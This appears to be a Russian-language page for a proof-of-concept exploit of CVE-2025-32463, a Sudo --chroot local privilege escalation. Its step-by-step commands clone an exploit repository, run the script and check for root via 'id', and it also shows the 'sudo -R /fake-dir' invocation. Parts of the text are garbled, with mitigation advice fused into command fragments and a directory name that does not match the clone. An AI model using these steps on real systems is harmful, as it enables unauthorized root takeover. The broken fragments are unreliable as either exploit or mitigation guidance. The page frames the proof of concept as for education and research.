
CVE-2025-32463
Вот краткое описание CVE-2025-32463 без ссылок:
CVE-2025-32463 — это уязвимость локального повышения привилегий в Sudo версиях 1.9.14–1.9.17. Она злоупотребляет опцией --chroot (-R), манипулируя тем, как Sudo обрабатывает nsswitch.conf. Это позволяет локальному злоумышленнику обмануть Sudo и заставить его загрузить вредоносную разделяемую библиотеку, получив доступ root, даже если он не указан в файле sudoers.
sudo git clone https://github.com/B1ack4ash/Blackash-CVE-2025-32463.git
cd CVE-2025-32463
chmod +x CVE-2025-32463.sh
id
./CVE-2025-32463.sh
id
sudo -R /fake-dir some-command./fake-dir он размещает поддельный etc/nsswitch.conf, который заставляет Sudo разрешать пользователей или группы нестандартным способом.sudo --version--chroot, если в этом нет необходимостиДаже если у пользователя нет прав sudo, он потенциально может стать root, злоупотребив этой ошибкой. Это критическая проблема, затрагивающая многие системы, и её необходимо исправить немедленно.
Данный PoC предоставлен только в образовательных и исследовательских целях. Запуск его на любой системе без разрешения незаконен и неэтичен !!!